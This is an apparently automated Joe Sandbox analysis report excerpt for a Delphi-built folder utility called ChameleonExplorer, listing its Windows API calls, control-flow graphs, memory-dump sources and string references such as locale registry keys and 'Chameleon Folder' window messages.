                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:625
                                                                                                            Total number of Limit Nodes:12
execution_graph (rendered graph omitted; only the API-call nodes and the functions containing them are recoverable from the extracted edge list):
• Locale and UI language (332f750, 332f6f0, 332f480, 332ba20): GetThreadUILanguage, GetThreadPreferredUILanguages, SetThreadPreferredUILanguages, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, IsValidLocale, GetLocaleInfoW
• Registry locale lookup (332fd10): GetModuleFileNameW, RegOpenKeyExW (six call sites), RegQueryValueExW, RegCloseKey; import resolver at 332fac0: GetModuleHandleW, GetProcAddress, lstrlenW
• File and module (33307f0, 3330280, 34082b0): GetModuleFileNameW, FindFirstFileW, FindClose, CloseHandle
• Process, thread and synchronisation (332b3c0, 332ac80, 33313f0, 33314c0, 3404900, 332f8c0, 3331730, 33317b0): GetCurrentThreadId, GetVersion, FreeLibrary, ExitProcess, RegisterWindowMessageW (six call sites), EnterCriticalSection, LeaveCriticalSection, TlsGetValue, TlsSetValue
• Memory management (3324dd0, 3324850, 3324a10, 3324b10, 3325c10, 3325a40, 3325b40, 33267f0, 3326990): VirtualAlloc, VirtualFree, VirtualQuery, with Sleep retry loops at 3324850 and 3325c10
• Console output and COM strings (332b2e0, 33257a0, 332c060, 332b930): GetStdHandle, WriteFile, SysFreeString

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
• Associated: 00000014.00000002.2155157735.0000000003320000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2155204603.000000000340C000.00000020.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2157795495.0000000003414000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2157917750.000000000341D000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2157974752.000000000341E000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158027095.000000000341F000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158090501.0000000003421000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158141559.0000000003422000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158209247.0000000003424000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158261577.0000000003425000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158326029.0000000003427000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158326029.000000000342D000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158473047.0000000003432000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158530457.0000000003434000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158580343.0000000003435000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158635623.0000000003436000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158635623.0000000003438000.00000002.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
Similarity
• API ID: Open$QueryValue$CloseFileModuleName
• String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
• API String ID: 2701450724-3496071916
• Opcode ID: bd44fe087a9f118a2c58fb0c2ce0e3a9be6f85b68687148e117124603ab9136e
• Instruction ID: 22abb7e3e4f3f94d6ca484ef261ba0ae56d5b3a7c98785219b001541203de356
• Opcode Fuzzy Hash: bd44fe087a9f118a2c58fb0c2ce0e3a9be6f85b68687148e117124603ab9136e
• Instruction Fuzzy Hash: 9F61E776600BD589DB30DF61ECD43DA27A8FB89788F9011259A8D4BB29EF78C345C744

Control-flow Graph

APIs
• GetUserDefaultUILanguage.KERNEL32 ref: 0333048E
• GetLocaleInfoW.KERNEL32 ref: 033304A7
  • Part of subcall function 03330280: FindFirstFileW.KERNEL32 ref: 033302B2
  • Part of subcall function 03330280: FindClose.KERNEL32 ref: 033302CD
Memory Dump Source
• Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
Similarity
• API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
• String ID:
• API String ID: 3216391948-0
• Opcode ID: 97cdfd62aadaddb4f0cf79133ca0249d7517bd1d6b9947b83c42f3bcc0431660
• Instruction ID: 8f800c8f5e99c7d7027137bf8dc9218ecfbd063c58ef17a53b36fa07cba9c0e3
• Opcode Fuzzy Hash: 97cdfd62aadaddb4f0cf79133ca0249d7517bd1d6b9947b83c42f3bcc0431660
• Instruction Fuzzy Hash: 3721B77A610B548ADB50EF35D8D03D92BA4FB49BDCF516102EA4E4BB58CF34C0458780

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: b2dc494c3c2f04cc2326f6bbeefa0f09e74b2d04e3ffc9d0934e39f13174eb97
• Instruction ID: de4e3ac9624cd0646185d66181510f5636813acbe99309dbc5483b162a14427e
• Opcode Fuzzy Hash: b2dc494c3c2f04cc2326f6bbeefa0f09e74b2d04e3ffc9d0934e39f13174eb97
• Instruction Fuzzy Hash: 99F05E2A602AE089CB71EE31D8D42EC2B109B5676CF081311D67D0FBE8DE10C6568740

Control-flow Graph

APIs
• RegisterWindowMessageW.USER32 ref: 03404A9F
• RegisterWindowMessageW.USER32 ref: 03404AC2
• RegisterWindowMessageW.USER32 ref: 03404AE5
• RegisterWindowMessageW.USER32 ref: 03404B08
• RegisterWindowMessageW.USER32 ref: 03404B2B
• RegisterWindowMessageW.USER32 ref: 03404B4E
Strings
• Folder64.dll, xrefs: 03404B6A
• WM_PATH_DIALOG_GET by Chameleon Folder, xrefs: 03404A98
• WM_HOOK_WINDOW by Chameleon Folder, xrefs: 03404B47
• ChameleonFolderHelper, xrefs: 03404959
• WM_HOOK_LOG by Chameleon Folder, xrefs: 03404B24
• WM_PATH_BROWSE_SET by Chameleon Folder, xrefs: 03404ADE
• WM_SET_FOREGROUND by Chameleon Folder, xrefs: 03404A75
• WM_PATH_DIALOG_SET by Chameleon Folder, xrefs: 03404ABB
• WM_DIALOG_YPS by Chameleon Folder, xrefs: 03404B01
Memory Dump Source
• Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
Similarity
• API ID: MessageRegisterWindow
• String ID: ChameleonFolderHelper$Folder64.dll$WM_DIALOG_YPS by Chameleon Folder$WM_HOOK_LOG by Chameleon Folder$WM_HOOK_WINDOW by Chameleon Folder$WM_PATH_BROWSE_SET by Chameleon Folder$WM_PATH_DIALOG_GET by Chameleon Folder$WM_PATH_DIALOG_SET by Chameleon Folder$WM_SET_FOREGROUND by Chameleon Folder
• API String ID: 1814269913-3724733743
• Opcode ID: 2e1987c7ff812932dd0c036f9d0e5a9e185d2c6c43f3db19ff6a540cb528cede
• Instruction ID: 3a86fcf92ba68151747fdac977a944f7a6c86e0731fdba2b34f6b392bb20cd73
• Opcode Fuzzy Hash: 2e1987c7ff812932dd0c036f9d0e5a9e185d2c6c43f3db19ff6a540cb528cede
• Instruction Fuzzy Hash: 9C515E79A14B808EE361EF20ECA239A33A8F745318F508519C64C4F7A4DFBD9749CB90

Control-flow Graph

APIs
• GetCurrentThreadId.KERNEL32 ref: 0332B3F0
• FreeLibrary.KERNEL32 ref: 0332B4E6
• ExitProcess.KERNEL32 ref: 0332B53A
  • Part of subcall function 0332B2E0: GetStdHandle.KERNEL32(?,?,?,?,?,?,?,0332B3DB), ref: 0332B319
  • Part of subcall function 0332B2E0: WriteFile.KERNEL32 ref: 0332B33D
  • Part of subcall function 0332B2E0: GetStdHandle.KERNEL32 ref: 0332B348
  • Part of subcall function 0332B2E0: WriteFile.KERNEL32 ref: 0332B377
Memory Dump Source
• Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
Similarity
• API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
• String ID:
• API String ID: 3490077880-0
• Opcode ID: ca2f0a321db8abb945a96c98235d78302e6c0eac1ac380f9ffa05a8bf87ec55d
• Instruction ID: 0516f0294b2f76b7671aac5f31b65b40db3a01ce35169f7dd9cd62bd30102316
• Opcode Fuzzy Hash: ca2f0a321db8abb945a96c98235d78302e6c0eac1ac380f9ffa05a8bf87ec55d
• Instruction Fuzzy Hash: 9B410E35D14BA884FB22DF12ECC8726AFB8B706754F980155D9595E2B0CFBCA2C4D351

Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
control_flow_graph 126 34082b0-34082c4 127 34082ca-34082cc 126->127 128 340839b-34083a6 126->128 129 34082d2-3408311 call 33332f0 127->129 130 34083d8-34083dd 127->130 131 34083b7-34083c2 128->131 132 34083a8-34083b2 call 3333680 128->132 139 3408313-3408321 129->139 140 3408326-3408369 call 33333e0 call 3333610 129->140 135 34083d3 call 3404fa0 131->135 136 34083c4-34083ce CloseHandle 131->136 132->131 135->130 136->135 139->130 145 3408394 call 3404f70 140->145 146 340836b-340838d call 3327e20 140->146 149 3408399 145->149 146->145 149->130
APIs
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,03413B62), ref: 034083CE
Strings
• {A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER64}, xrefs: 034082EB
• H, xrefs: 0340834D
Memory Dump Source
• Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
• Associated: 00000014.00000002.2155157735.0000000003320000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2155204603.000000000340C000.00000020.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2157795495.0000000003414000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2157917750.000000000341D000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2157974752.000000000341E000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158027095.000000000341F000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158090501.0000000003421000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158141559.0000000003422000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158209247.0000000003424000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158261577.0000000003425000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158326029.0000000003427000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158326029.000000000342D000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158473047.0000000003432000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158530457.0000000003434000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158580343.0000000003435000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158635623.0000000003436000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158635623.0000000003438000.00000002.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
Similarity
• API ID: CloseHandle
• String ID: H${A5E80AC0-4E7B-11D6-AE77-444553546264FoLDER64}
• API String ID: 2962429428-3734761527
• Opcode ID: 64d95b279b88c49e25f273251f667473079603675f6e0e152eb5843f11b6a295
• Instruction ID: 6cb70da68469583044ff129c6067d83a83f0578bd1865a4e4d8a2b8c72db1230
• Opcode Fuzzy Hash: 64d95b279b88c49e25f273251f667473079603675f6e0e152eb5843f11b6a295
• Instruction Fuzzy Hash: 3431283A600B44C9EB11DF39E89036E7364F784BA4F848222EA5D9B7E0CF3CD6448308

Control-flow Graph

control_flow_graph 184 3324dd0-3324dfe 185 3324e04-3324e11 184->185 186 3325039-3325040 184->186 187 3324e13-3324e28 185->187 188 3324e81-3324e8a 185->188 189 3325046-3325058 186->189 190 332517e-3325184 186->190 191 3324e44-3324e53 187->191 192 3324e2a-3324e3a 187->192 188->187 195 3324e8c-3324e99 188->195 193 332505a call 3324850 189->193 194 332505f-3325080 189->194 196 3325186 call 3324b10 190->196 197 332518b-3325193 190->197 201 3324e59-3324e68 191->201 202 3324eec-3324eee 191->202 199 3324e3c-3324e3f 192->199 200 3324e6d-3324e7c 192->200 193->194 204 3325082-332508a 194->204 205 332508c-332509b 194->205 195->187 206 3324e9f-3324eac 195->206 196->197 199->197 200->197 201->197 207 3324ef0 call 3324850 202->207 208 3324ef5-3324eff 202->208 209 33250f2-3325113 204->209 210 33250b0-33250b8 205->210 211 332509d-33250ae 205->211 206->187 212 3324eb2-3324ec5 206->212 207->208 219 3324f94-3324fa0 208->219 220 3324f05-3324f48 208->220 217 3325130-3325142 209->217 218 3325115-3325127 209->218 213 33250ba-33250dc 210->213 214 33250de-33250e0 call 3324a10 210->214 211->209 212->188 215 3324ec7-3324eda Sleep 212->215 221 33250e5-33250ed 213->221 214->221 215->187 222 3324ee0-3324eea Sleep 215->222 227 3325164 217->227 228 3325144-332515b 217->228 218->217 224 3325129 218->224 229 3324fa2-3324fb6 219->229 230 3324fcc-3324fd2 call 3324a10 219->230 225 3324f4a-3324f55 220->225 226 3324f5e-3324f72 220->226 221->197 222->188 224->217 225->226 232 3324f57 225->232 235 3324f74-3324f92 call 3324900 226->235 236 3324fec 226->236 233 3325169-332517c 227->233 228->233 234 332515d-3325162 call 3324900 228->234 237 3324fba-3324fca 229->237 238 3324fb8 229->238 240 3324fd7-3324fdd 230->240 232->226 233->197 234->233 239 3324ff1-3325034 235->239 236->239 237->239 238->237 239->197 240->239 243 3324fdf-3324fe7 240->243 243->197
APIs
Memory Dump Source
• Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
• Associated: 00000014.00000002.2155157735.0000000003320000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2155204603.000000000340C000.00000020.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2157795495.0000000003414000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2157917750.000000000341D000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2157974752.000000000341E000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158027095.000000000341F000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158090501.0000000003421000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158141559.0000000003422000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158209247.0000000003424000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158261577.0000000003425000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158326029.0000000003427000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158326029.000000000342D000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158473047.0000000003432000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158530457.0000000003434000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158580343.0000000003435000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158635623.0000000003436000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158635623.0000000003438000.00000002.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 148c655e062c9401b5d54ed2250320394f284ebef5256e8a6baef709daf25847
• Instruction ID: 9c7fdfb2afa93f0d8d0a8ce604579aa7a726ecd286d0df8b43d058bb79914fd5
• Opcode Fuzzy Hash: 148c655e062c9401b5d54ed2250320394f284ebef5256e8a6baef709daf25847
• Instruction Fuzzy Hash: 64B16773601BA086EB16CF29E8D036DFBA8F344B64F588229E7594B794DB78E561C340

Control-flow Graph

control_flow_graph 246 33267f0-33267fc 247 3326817-3326821 246->247 248 3326823 247->248 249 33267fe-3326814 VirtualFree 247->249 250 3326826-33268be 248->250 249->247 250->250 251 33268c4-33268e1 250->251 252 33268e4-3326905 251->252 252->252 253 3326907-3326938 call 3327e20 252->253 256 3326953-332695d 253->256 257 332693a-3326950 VirtualFree 256->257 258 332695f-3326980 256->258 257->256
APIs
Memory Dump Source
• Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
• Associated: 00000014.00000002.2155157735.0000000003320000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2155204603.000000000340C000.00000020.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2157795495.0000000003414000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2157917750.000000000341D000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2157974752.000000000341E000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158027095.000000000341F000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158090501.0000000003421000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158141559.0000000003422000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158209247.0000000003424000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158261577.0000000003425000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158326029.0000000003427000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158326029.000000000342D000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158473047.0000000003432000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158530457.0000000003434000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158580343.0000000003435000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158635623.0000000003436000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158635623.0000000003438000.00000002.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
• Opcode ID: 60f5bfc53a8f07829ae122f60ee6bdd8e7a12783feef1ca06ab4112a4912aae6
• Instruction ID: 7640eef3c55238464e92090c75509511adf095857ad25eb1695f976c7b4fdfb4
• Opcode Fuzzy Hash: 60f5bfc53a8f07829ae122f60ee6bdd8e7a12783feef1ca06ab4112a4912aae6
• Instruction Fuzzy Hash: 9F4148F4A81F5096EE05CB81E9A47D96B6ABB05792F85C032E85D5F724EB3CD3A5C300

APIs
• GetSystemDefaultUILanguage.KERNEL32 ref: 0333070D
Memory Dump Source
• Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
• Associated: 00000014.00000002.2155157735.0000000003320000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2155204603.000000000340C000.00000020.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2157795495.0000000003414000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2157917750.000000000341D000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2157974752.000000000341E000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158027095.000000000341F000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158090501.0000000003421000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158141559.0000000003422000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158209247.0000000003424000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158261577.0000000003425000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158326029.0000000003427000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158326029.000000000342D000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158473047.0000000003432000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158530457.0000000003434000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158580343.0000000003435000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158635623.0000000003436000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000014.00000002.2158635623.0000000003438000.00000002.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
Similarity
• API ID: DefaultLanguageSystem
• String ID:
• API String ID: 4166810957-0
• Opcode ID: fbdebada3cab3e68eb1c39c76fbd2d7930b03274351f4ac81c1d286bf1ce653f
• Instruction ID: e6ee090da30acc22554832ce708b05049f423dafa9c28b7590647318ce76eb3c
• Opcode Fuzzy Hash: fbdebada3cab3e68eb1c39c76fbd2d7930b03274351f4ac81c1d286bf1ce653f
• Instruction Fuzzy Hash: D151C13A600B9489DB24EF75D8943DD2B66F785B9CF54A016EA0E8BB58DF74C588C380

Control-flow Graph

                                                                                                            control_flow_graph 311 332ac80-332aca4 312 332aca6 311->312 313 332acad-332acfa GetCurrentThreadId 311->313 312->313 314 332ad08 313->314 315 332acfc-332ad06 313->315 316 332ad10-332ad51 314->316 315->316 317 332ad53-332ad5a 316->317 318 332ad5c 316->318 317->318 319 332ad65-332ad6d 317->319 318->319 320 332ad82-332ad89 319->320 321 332ad6f-332ad75 319->321 322 332ad94-332ad9c 320->322 323 332ad8b 320->323 321->320 324 332adb0-332adb7 322->324 325 332ad9e-332adaa call 33271d0 322->325 323->322 326 332adc0 call 332b3c0 324->326 327 332adb9-332adbe call 332abd0 324->327 325->324 333 332adc5-332add2 326->333 327->333
                                                                                                            APIs
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0332ACEA
                                                                                                              • Part of subcall function 0332B3C0: GetCurrentThreadId.KERNEL32 ref: 0332B3F0
                                                                                                              • Part of subcall function 0332B3C0: FreeLibrary.KERNEL32 ref: 0332B4E6
                                                                                                              • Part of subcall function 0332B3C0: ExitProcess.KERNEL32 ref: 0332B53A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
                                                                                                            • Associated: 00000014.00000002.2155157735.0000000003320000.00000002.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2155204603.000000000340C000.00000020.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2157795495.0000000003414000.00000004.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2157917750.000000000341D000.00000008.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2157974752.000000000341E000.00000004.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2158027095.000000000341F000.00000008.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2158090501.0000000003421000.00000004.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2158141559.0000000003422000.00000008.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2158209247.0000000003424000.00000004.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2158261577.0000000003425000.00000008.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2158326029.0000000003427000.00000004.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2158326029.000000000342D000.00000004.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2158473047.0000000003432000.00000004.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2158530457.0000000003434000.00000008.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2158580343.0000000003435000.00000004.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003436000.00000002.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003438000.00000002.00000001.01000000.00000011.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentThread$ExitFreeLibraryProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 274535261-0
                                                                                                            • Opcode ID: a99cd9dad5f5764cd4f20c1a1b1223305cab0d37967c0085830887904e01cc4c
                                                                                                            • Instruction ID: 1649eb3d2502e682e6a86fb77fe492d780ef1637ab550f57c0e412d604f39f35
                                                                                                            • Opcode Fuzzy Hash: a99cd9dad5f5764cd4f20c1a1b1223305cab0d37967c0085830887904e01cc4c
                                                                                                            • Instruction Fuzzy Hash: 98312332600BD8DAD722DF20EC887DA3BBDF708759F840125DA095B664CF74968AC700

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32 ref: 0333082D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileModuleName
                                                                                                            • String ID:
                                                                                                            • API String ID: 514040917-0
                                                                                                            • Opcode ID: 282ca0b9e463dd29b21c6dbe21d58bcbf1495809708ea1d844c4ddf7e0550c14
                                                                                                            • Instruction ID: db6ec3da5d1aa4aa15975437c9ac6933e0e25172a34c87a1142c53a25997d506
                                                                                                            • Opcode Fuzzy Hash: 282ca0b9e463dd29b21c6dbe21d58bcbf1495809708ea1d844c4ddf7e0550c14
                                                                                                            • Instruction Fuzzy Hash: 42115736610B6089DB14EF75D8D43DD2B65EB0878CF40601AEA4E4BB48DF39C189C380

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 03331581
                                                                                                              • Part of subcall function 033313F0: GetVersion.KERNEL32 ref: 033313F4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentThreadVersion
                                                                                                            • String ID:
                                                                                                            • API String ID: 888907627-0
                                                                                                            • Opcode ID: 02b7317e8150fb308768483fd461c945c5709eb705f731a55198bd03be133458
                                                                                                            • Instruction ID: 4c6bde0f37d685f3f773584ab2fc12404952300aee4251f85bfa821c6afc5fab
                                                                                                            • Opcode Fuzzy Hash: 02b7317e8150fb308768483fd461c945c5709eb705f731a55198bd03be133458
                                                                                                            • Instruction Fuzzy Hash: 7211C578D0175489F702FB62B8C47873BBCBB05314F904619E558AE360EB3C6364CB96

                                                                                                            Control-flow Graph: blocks 3324a10-3324aa9 (calls 3324970, VirtualAlloc)
                                                                                                            APIs
                                                                                                            • VirtualAlloc.KERNEL32(?,?,?,033250E5), ref: 03324A33
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: 5ba0068487a5cd94d616b51fe0c8ca05f1dabbac11d6e963a1fa4065d79c3fe1
                                                                                                            • Instruction ID: 98d20bdfb20f6d33c6c09852972c8f35c6ed5f69433f50e2bd700f81459b8a3f
                                                                                                            • Opcode Fuzzy Hash: 5ba0068487a5cd94d616b51fe0c8ca05f1dabbac11d6e963a1fa4065d79c3fe1
                                                                                                            • Instruction Fuzzy Hash: 1D0169B6702B4182EB02CF5AF9E13667BACB708744F604439AA4C9B324DB398666C340

                                                                                                            Control-flow Graph: blocks 3326990-33269f7 (calls 33242a0, 3325fd0, 33267f0, VirtualFree)
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
                                                                                                            Similarity
